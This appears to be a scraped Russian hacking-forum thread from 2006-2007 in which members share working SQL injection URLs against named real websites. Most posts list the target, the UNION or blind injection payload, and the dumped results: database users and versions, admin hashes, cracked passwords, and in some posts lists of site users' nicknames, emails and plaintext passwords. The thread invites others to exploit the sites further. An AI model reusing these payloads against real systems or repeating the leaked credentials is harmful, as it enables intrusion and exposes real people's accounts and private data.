SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. mtn

    mtn Member

    Joined:
    12 Dec 2006
    Messages:
    21
    Likes Received:
    8
    Reputations:
    -3
    PHP:
    http://iteco.ru/search.php?q=1'+union+select+1,user.usrname+from+mysql.user/*
    PHP:
    User max'@'localhost
     
  2. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    experts.uchicago.edu
    Code:
    http://experts.uchicago.edu/experts.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+--+
    4.0.24-standard
    Code:
    http://experts.uchicago.edu/experts.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,user,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+mysql.user+limit+0,1+--+
    Code:
    root:0bd914e54597ba5d
     
    3 people like this.
  3. ENFIX

    ENFIX Elder - Старейшина

    Joined:
    6 Jun 2006
    Messages:
    175
    Likes Received:
    122
    Reputations:
    75
    Duke News
    http://dukemednews.duke.edu

    Сама скуля:
    Code:
    http://dukemednews.duke.edu/news/article.php?id=6041+and+1=0
    
    Выводим столбцы:
    Code:
    http://dukemednews.duke.edu/news/article.php?id=6041+and+1=0+UNION+SELECT+1,2,3,4/*
    
    //будут в самом низу справа

    Выводим имя_пользователя:версию_бд:имя_бд:
    Code:
    http://dukemednews.duke.edu/news/article.php?id=6041+and+1=0+UNION+SELECT+1,2,concat_ws(0x3a,user(),version(),database()),4/*
    
    [email protected]:4.0.18:news

    File_priv выкл:
    Code:
    http://dukemednews.duke.edu/news/article.php?id=6041+and+1=0+UNION+SELECT+1,2,load_file(0x2F6574632F706173737764),4/*
    
    Есть доступ в mysql.user
    Code:
    http://dukemednews.duke.edu/news/article.php?id=6041+and+1=0+UNION+SELECT+1,2,concat_ws(0x3a,user,password),4+from+mysql.user/*
    
    Специально для вас расшифровал ;)
    Code:
    mnogosearch:0547d8b07eba42f3:gh34mx92
    root:623460e26f081bbc:mt01du01
    web:761b2fc844890384:fr56nv29
    
    Соседствующие сайты:
    Code:
    1) news.mc.duke.edu
    2) dukemednews.duke.edu
    3) dukemednews.com
    4) dukemednews.org
    
    админка:
    Code:
    http://dukemednews.duke.edu/admin
    
    Пока все :)
     
    #3883 ENFIX, 28 Nov 2007
    Last edited: 28 Nov 2007
    5 people like this.
  4. halkfild

    halkfild Members of Antichat

    Joined:
    11 Nov 2005
    Messages:
    365
    Likes Received:
    578
    Reputations:
    313
    dialog.kz

    http://www.dialog.kz/site.php?lan=ru&id=92&pub=-607+union+select+1,2,3,4,concat_ws(0x3a3a,version(),user(),database()),6,7,8,9,10,11,12,13,14+from+users/*'

    4.1.22-standard::dialog_hl@localhost::dialog_hl

    http://www.dialog.kz/site.php?lan=ru&id=92&pub=-607+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+from+users/*'

    коннект хреновый, подберите поля и юзайте =)
     
    _________________________
    1 person likes this.
  5. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    http://www.dialog.kz/site.php?lan=ru&id=92&pub=-607+union+select+1,2,3,4,concat_ws(char(58),username,userpass),6,7,8,9,10,11,12,13,14+from+users/*
    admin:edf95addf04ca869faa73677ae66f5ea



    http://www.needaplacetogo.co.uk/fashion.asp?id=1+or+1=(SELECT+TOP+1+cast(M_USERNAME+as+nvarchar)%2B%27%3A%27%2Bcast(M_PASSWORD+as+nvarchar)+from+FORUM_MEMBERS+WHERE+MEMBER_ID=1)--
     
    #3885 Ded MustD!e, 29 Nov 2007
    Last edited: 29 Nov 2007
    3 people like this.
  6. fRg

    fRg Active Member

    Joined:
    28 Dec 2006
    Messages:
    111
    Likes Received:
    172
    Reputations:
    0
    Италия

    Powered By Centro Studi Airone

    Уязвимость в скрипте leggi.php

    Примеры:
    Code:
    http://www.deltard.com/leggi.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(   ),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*&
    4.1.22-standard-log:Sql84077_1:[email protected]
    Code:
    http://www.onecapital.it/homepage/leggi.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
    4.0.27-standard-log:Sql20147_3:[email protected]
    Code:
    http://www.anguillarainforma.it/leggi.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
    4.0.27-standard-log:Sql24700_1:[email protected]
    Code:
    http://www.101vetrine.it/leggi.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),databas   e(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*  
    4.0.27-standard-log:Sql72154_1:[email protected]
     
    3 people like this.
  7. TheSoul

    TheSoul Elder - Старейшина

    Joined:
    12 Nov 2007
    Messages:
    83
    Likes Received:
    35
    Reputations:
    0
    http://www.vedo.ru
    Code:
    http://www.vedo.ru/guest/guest.php?id=-1+union+select+1,2,username,user_password,5,6,7,8+from+phpbb_users/*
    admin:061ed190e137ee416c25b4e8658fd3a3

    http://www.redbullreaccion.com/
    Code:
    http://www.redbullreaccion.com/news_detail.php?lang=en&id=-1+union+select+1,2,3,user(),version(),6,database(),8,9,10/*
     
    1 person likes this.
  8. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    akce.cvut.cz

    https://akce.cvut.cz/?node=cal-en&aid=-1'+union+select+1,2,3,4,concat_ws(0x2F,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,1,1,1,1,1,1,1,1,1/*

    4.1.11-Debian_4sarge7-log/akce/akce@localhost


    https://akce.cvut.cz/?node=cal-en&aid=-1'+union+select+1,2,3,4,concat_ws(0x2F,cast(username+as+binary),cast(password+as+binary)),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,1,1,1,1,1,1,1,1,1+from+users/*

    логин/хеш
    admin/*474ECE06942A2A91CBB3CB29D6C6F6A97C449630 прикольный хеш ))

    ---------------------------------------------------------------------

    http://www.balka.kharkov.ua/select_ss.php?tp=1&ss=-1+union+select+1,concat_ws(0x2F,version(),database(),user())/*

    4.0.27/portal/adminkh@localhost

    --------------------------------------------------------------------
    http://www.megaspravka.ru/news_show.php?id=-1+union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7/*

    4.1.22/wwwmegaspravkaru/megaspra@localhost
     
    3 people like this.
  9. fRg

    fRg Active Member

    Joined:
    28 Dec 2006
    Messages:
    111
    Likes Received:
    172
    Reputations:
    0
    Италия

    gsteam.biz
    Code:
    http://www.gsteam.biz/video.php?media_ID=-1+union+select+1,2,concat(aes_decrypt(aes_encrypt(version(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(database(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(user(),0x71),0x71)),4/*
    4.1.11-Debian_4sarge7-log:gsteam_biz:jbag0007@localhost

    portalstiri.com
    Code:
    http://www.portalstiri.com/stiri.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5/*
    4.1.22-standard : pstiri_pstiridb : pstiri@localhost

    emcquadro.com - ПОЗОР!!!
    Code:
    http://www.emcquadro.com/php.php?id_arg=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8/*
    4.1.22-standard-log:emcquadr_emcquadr13860:emcquadr_interne@localhost

    inputdata.net
    Code:
    http://www.inputdata.net/concordia/sezione.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6/*
    4.0.27-standard-log:Sql19754_3:[email protected]

    infomedia2000.it
    Code:
    http://www.infomedia2000.it/prometeo/sezione.php?ID=1%20AND%20ascii(lower(substring(version(),1,1)))=51/*
    version() : 3.23.58

    viaggiavventurenelmondo.it
    Code:
    http://www.viaggiavventurenelmondo.it/nuovosito/eventi/cdoc/entry.php?id=-1+union+select+concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8,9/*
    5.0.37-log:cdocanm:[email protected]

    201 таблица:
    Code:
    http://www.viaggiavventurenelmondo.it/nuovosito/eventi/cdoc/entry.php?id=-1+union+select+table_name,2,3,4,5,6,7,8,9+from+information_schema.tables+limit+200,1/*
    Админ [ логин : пасс ] :
    Code:
    simz : stealthx77cdd
     
    4 people like this.
  10. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    clubsss.com

    http://clubsss.com/lvov/show_club.php?club=-1+union+select+1,2,concat_ws(0x2F,cast(version()+as+binary),cast(database()+as+binary),cast(user()+as+binary)),4,5,6,7,8,9,1,1,1,1,1,1,1,1,1,1/*

    4.1.8-standard/conus_clubsss/conus_clubsss@localhost



    http://clubsss.com/lvov/show_club.php?club=-1+union+select+1,password,3,4,5,6,7,8,9,1,1,1,1,1,1,1,1,1,1+from+users/*

    хеш колумн с логином не подобрал (

    -----------------------------------------------------------------------------
    myworld.md


    http://www.myworld.md/myprofile.php?idd=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x2F,version(),database(),user()),16,17,18,19,1,1,1,1,1,1,1,1,1/*

    5.0.27/13195/13195@localhost


    http://www.myworld.md/myprofile.php?idd=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x2F,nic,mail_all,mail_secret,upass),16,17,18,19,1,1,1,1,1,1,1,1,1+from+user+limit+13,1/*

    логин/общее мыло/секретное мыло/пароль не хеш.
    sestri4ka/[email protected]/[email protected]/sanika :)

    ----------------------------------------------------------------------------
    4lover.de


    http://4lover.de/view.php?l=&id=-1'+union+select+1,2,concat_ws(0x2F,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/*

    5.0.45/DB179434/[email protected]

    Есть доступ к information_schema
     
    1 person likes this.
  11. Mike 007

    Mike 007 Elder - Старейшина

    Joined:
    4 Apr 2007
    Messages:
    58
    Likes Received:
    47
    Reputations:
    -4
    Code:
    http://www.afdspn.it/articolo.php?id=-1+union+select+1,concat_ws(0x3a,0x3a,user(),0x3a,database(),0x3a,version(),0x3a,0x3a)/*
     
    2 people like this.
  12. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    Code:
    [B]http://www.puntoinformatico.it[/B]/download/file.asp?file_id=1+or+1=(SELECT+TOP+1+cast(Nickname+as+nvarchar)%2B%27%3A%27%2Bcast(Password+as+nvarchar)+from+Utenti+where+ID_Prov=1)--
     
    4 people like this.
  13. Fata1ex

    Fata1ex Elder - Старейшина

    Joined:
    12 Dec 2006
    Messages:
    703
    Likes Received:
    300
    Reputations:
    38
    ENFIX, http://forum.antichat.ru/showpost.php?p=515305&postcount=3904

    edu

    Code:
    http://www.choices.edu/resources/detail.php?id=-49+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
    4.1.14-log:[email protected]:Choices
     
    #3893 Fata1ex, 29 Nov 2007
    Last edited: 29 Nov 2007
    1 person likes this.
  14. mtn

    mtn Member

    Joined:
    12 Dec 2006
    Messages:
    21
    Likes Received:
    8
    Reputations:
    -3
    Code:
    http://www.emz-hanauer.de/public_main_modul.php?page_id=-1+union+select+1,user.usrname+from+mysql.user/*
    Code:
    Access denied for user 'db159514_2'@'127.0.0.2' to database 'mysql'
     
  15. Fata1ex

    Fata1ex Elder - Старейшина

    Joined:
    12 Dec 2006
    Messages:
    703
    Likes Received:
    300
    Reputations:
    38
    PR:5

    Code:
    http://www.mgnsw.org.au/museums_and_galleries.php?id=-16+union+select+1,2,3,4,5,6/*
    mgnsw@localhost:4.1.20:mgnsw


    PR:5

    Code:
    http://www.churchilltrust.com.au/content.php?id=-54+union+select+1,2,3,convert(concat_ws(char(58),version(),user(),database())+using%20latin1),5,6,7,8,9,10,11/*
    winston@localhost:4.1.11-Debian_4sarge7:churchilltrust



    PR:5

    Code:
    http://www.wormweb.nl/agenda.php?id=-1+union+select+aes_decrypt(aes_encrypt(user,0x71),0x71)+from+users/*
    wormweb@localhost:4.1.12-Debian_0.dotdeb.0-log:wormweb01
     
    1 person likes this.
  16. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    spblove.ru

    http://www.spblove.ru/mistakes.php?id=-1+union+select+1,concat_ws(0x2F,cast(version()+as+binary),cast(database()+as+binary),cast(user()+as+binary))/*

    4.1.11-Debian_4sarge2-log/spblove8_main/[email protected]


    http://www.spblove.ru/mistakes.php?id=-1+union+select+1,concat_ws(0x2F,login,password,icq)+from+ankets+limit+1300,1/*

    логин/хеш/уин
    -----------------------------------------------------------------------------

    http://www.happywedding.ru/ladies_details.php?recordID=-1+UNION+SELECT+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8,9,10,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/*

    4.1.22-lk-log/hapwru_lady/hapwru_lady@localhost
    --------------------------------------------------------------------------

    http://www.prosex.com.ua/news/show.php?id=-1+union+select+1,2,concat_ws(0x2F,version(),database(),user()),4,5,6/*

    4.1.22/prosex/prosex@localhost

    --------------------------------------------------------------------------
    http://news.13rus.ru/?id=-1+union+select+1,2,concat_ws(0x2F,version(),database(),user()),4,5,6/*

    4.1.22-standard/vitaliy_13rus/vitaliy_13rus@localhost

    --------------------------------------------------------------------------
    ecoby.info

    http://www.ecoby.info/index.php?page=measure&src=main&mid=-1+union+select+1,2,3,4,concat_ws(0x2F,version(),database(),user()),6,7,8,9,10,11,12,13,14/*

    4.1.21-standard-log/ecobyin_iac/ecobyin_User@localhost


    http://www.ecoby.info/index.php?page=measure&src=main&mid=-1+union+select+1,2,3,4,5,concat_ws(0x2F,ulogin,upass,umail),7,8,9,10,11,12,13,14+from+users/*

    логин/хеш/мейл
     
    4 people like this.
  17. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    http://www.privacyconference2006.co.uk/

    Code:
    http://www.privacyconference2006.co.uk/index.asp?PageID=-1+union+select+version(),2/*
    Не смог подобрать таблицы...
     
    2 people like this.
  18. Fata1ex

    Fata1ex Elder - Старейшина

    Joined:
    12 Dec 2006
    Messages:
    703
    Likes Received:
    300
    Reputations:
    38
    PR:3

    Code:
    http://www.theshiznit.co.uk/review.php?id=-242+union+select+1,2,3,4,concat_ws(char(58),user(),version(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*
    [email protected]:5.0.45-log:sr0291893

    Code:
    http://www.theshiznit.co.uk/review.php?id=-242+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables+limit+24,1/*
    shiznit_users

    Code:
    http://www.theshiznit.co.uk/review.php?id=-242+union+select+1,2,3,4,column_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.columns+where+table_name='shiznit_users'+limit+1,1/*
    nickname : email : password : id

    Code:
    http://www.theshiznit.co.uk/review.php?id=-242+union+select+1,2,3,4,concat_ws(char(58),nickname,email,password,id),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+shiznit_users/*
    Code:
    [B]Bob:[email protected]:shiznitgod:1[/B]
    andy:andy:12345:8
    Pandaemonium:[email protected]:preacher:10
    thefuckestuppest:[email protected]:wolf359:11
    blamfish:[email protected]:kamikaze:12
    monkey_man:[email protected]:monkeyman:13
    Geffdof:[email protected]:kennym:14
    ...

    PR:4

    Code:
    http://www.lunarenergy.co.uk/newsDetail.php?id=-12+union+select+1,2,3,4,5,convert(concat_ws(char(58),version(),user(),database())using%20latin1),7/*
    4.1.12-log:[email protected]:sca
     
    #3898 Fata1ex, 29 Nov 2007
    Last edited: 29 Nov 2007
    1 person likes this.
  19. .Begemot.

    .Begemot. Elder - Старейшина

    Joined:
    27 Mar 2007
    Messages:
    148
    Likes Received:
    233
    Reputations:
    0
    HTML:
    http://lada.cc/image.phtml?id=9999+union+select+0,1,2,3,4,5,6,7,8,9,10,11/*&item=galleries
    HTML:
    http://lada.cc/image.phtml?id=9999+union+select+0,1,2,3,4,concat(USER(),0x3a,VERSION(),0x3a,DATABASE(),0x3a,id,0x3a,login,0x3a,password),6,7,8,9,10,11+from+adm_users/*&item=galleries
    Admin
    login: BG
    password (hash): 7fd6766a2eef757f37d022422fe8aff5
     
    #3899 .Begemot., 29 Nov 2007
    Last edited: 29 Nov 2007
    2 people like this.
  20. Underwit

    Underwit Banned

    Joined:
    6 Oct 2006
    Messages:
    191
    Likes Received:
    137
    Reputations:
    16
    edu

    MySql5 hash
    root *74B1C21ACE0C2D6B0678A5E503D2A60E8F9651A3
     
    3 people like this.
Thread Status:
Not open for further replies.